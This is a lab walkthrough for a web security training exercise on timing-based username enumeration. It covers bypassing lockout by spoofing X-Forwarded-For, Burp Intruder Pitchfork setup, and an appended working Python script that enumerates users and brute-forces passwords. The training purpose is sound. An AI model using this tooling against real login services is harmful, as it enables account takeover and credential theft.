Username enumeration via response timing


Last updated 4 years ago


This lab is harder than the previous two. The first thing to notice is that it implements a form of IP-based brute-force protection; the lab description says this can be bypassed by manipulating HTTP request headers.

The hints section mentions the "X-Forwarded-For" HTTP header. A quick search turns up its definition: it is the header that proxies and load balancers add to pass the original client IP on to the back end. An application that reads it without checking that the request actually came through a trusted proxy will accept whatever value the client puts there, and the lab's lockout is keyed on that value.

After a few unsuccessful login attempts the login is blocked for 30 minutes.

So let's try to spoof our IP address with the "X-Forwarded-For" header by sending the request to Repeater.

Adding this header and setting it to an arbitrary value (for example 1) spoofed our IP address, and we are no longer blocked.

Also, by sending the request from Repeater with a correct username ("wiener") and passwords of different lengths, we can see that the response time grows with the length of the password. This suggests the server only does the expensive password check when the username exists, which is what makes the timing usable for enumeration: a long password with a valid username is slow, while invalid usernames answer quickly regardless of the password.

The next step is to send the request to Intruder to perform the brute-force attack, keeping a very long string in the password field. This time we need two payloads: one to change the value of the "X-Forwarded-For" header on every request, and one for the usernames wordlist. To do this, instead of the Sniper attack type we need to use the Pitchfork attack, which steps both payload positions together.

For the first payload we will use the "Numbers" payload type (sequential, step 1), so the header takes a new value on each iteration. Since the usernames list only has 100 entries, a range from 1 to 100 is enough.

The second payload will be a simple list, like the one used in the previous labs.

To see which username is the correct one, we need to compare the response times. In the attack window, click "Columns" and enable "Response received" and "Response completed", then sort by one of them. Network jitter can make a single response slow, so it is worth repeating the attack (with a fresh header range) and checking that the same username stands out both times. In this case, the response time for the username "guest" was consistently much longer than the others, so we can brute-force that username with the passwords wordlist, looking for the "302" response that indicates a successful login.

Logging in with that username and password completes the lab.
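The same two-stage attack scripted outside Burp, as an added example (this is not the lab's or Burp's own code). It assumes the lab's login form is a POST to /login with form fields `username` and `password`; `LAB_HOST` is a placeholder for your lab hostname, and the username and password lists are short constructed stand-ins for the lab wordlists. Each request gets a fresh X-Forwarded-For value so the per-IP lockout never trips, the username stage sends a long password and records the median response time per user, and the password stage looks for the 302.

```python
#!/usr/bin/env python3
"""Timing-based username enumeration with X-Forwarded-For rotation, followed
by a password brute-force against the discovered user.

Added example, not the lab's own code. Assumptions: PortSwigger lab login at
POST /login with fields `username` and `password`; LAB_HOST is a placeholder;
USERNAMES and PASSWORDS are constructed sample lists standing in for the lab
wordlists.
"""
import http.client
import statistics
import time
import urllib.parse

LAB_HOST = "YOUR-LAB-ID.web-security-academy.net"   # placeholder, not a real host
# A long (wrong) password makes the server-side password check measurably
# slower, but only for usernames that actually exist.
LONG_PASSWORD = "A" * 200
# Constructed sample lists. "wiener" is the known-valid account, so it should
# also show up as slow and acts as a sanity check on the timing signal.
USERNAMES = ["admin", "guest", "root", "test", "wiener"]
PASSWORDS = ["123456", "password", "qwerty"]


def build_request(index, username, password):
    """Return (headers, body) for login attempt number `index`.

    Every attempt carries a different X-Forwarded-For value, so the lockout
    (30 minutes after a few failures) is keyed on a fresh "client IP" each time.
    """
    body = urllib.parse.urlencode({"username": username, "password": password})
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Forwarded-For": f"10.0.{(index // 256) % 256}.{index % 256}",
    }
    return headers, body


def login_attempt(host, index, username, password):
    """Send one login POST and return (HTTP status, elapsed seconds)."""
    headers, body = build_request(index, username, password)
    conn = http.client.HTTPSConnection(host, timeout=15)
    try:
        start = time.perf_counter()
        conn.request("POST", "/login", body=body, headers=headers)
        resp = conn.getresponse()
        resp.read()                       # measure until the response completes
        return resp.status, time.perf_counter() - start
    finally:
        conn.close()


def measure_usernames(host, usernames, samples=3, attempt=login_attempt, start_index=1):
    """Median response time per username when logging in with LONG_PASSWORD.

    `samples` repeats per user smooth out network jitter; `attempt` is
    injectable so the logic can be exercised without a live target.
    """
    timings = {}
    index = start_index
    for user in usernames:
        times = []
        for _ in range(samples):
            _, elapsed = attempt(host, index, user, LONG_PASSWORD)
            index += 1
            times.append(elapsed)
        timings[user] = statistics.median(times)
    return timings


def slow_usernames(timings, factor=3.0):
    """Usernames whose median time exceeds `factor` times the overall median.

    The overall median is a sound baseline because most names in a wordlist
    are invalid, so valid ones stand out as outliers above it.
    """
    baseline = statistics.median(timings.values())
    return sorted(u for u, t in timings.items() if t > factor * baseline)


def brute_force_password(host, username, passwords, attempt=login_attempt, start_index=1000):
    """Return the first password that yields a 302 redirect (successful login)."""
    for offset, pw in enumerate(passwords):
        status, _ = attempt(host, start_index + offset, username, pw)
        if status == 302:
            return pw
    return None


if __name__ == "__main__":
    timings = measure_usernames(LAB_HOST, USERNAMES)
    for user, t in sorted(timings.items(), key=lambda kv: kv[1], reverse=True):
        print(f"{user:12s} {t:.3f}s")
    for user in slow_usernames(timings):
        print("candidate valid user:", user)
        print("password:", brute_force_password(LAB_HOST, user, PASSWORDS))
```

The X-Forwarded-For values walk through 10.0.0.0/16, which is plenty for a 100-name list times three samples plus the password stage; if the target keyed its lockout on something other than that header, every request after the first few would come back blocked and the timings would collapse to the same fast value, which is the signal to stop and look for a different bypass.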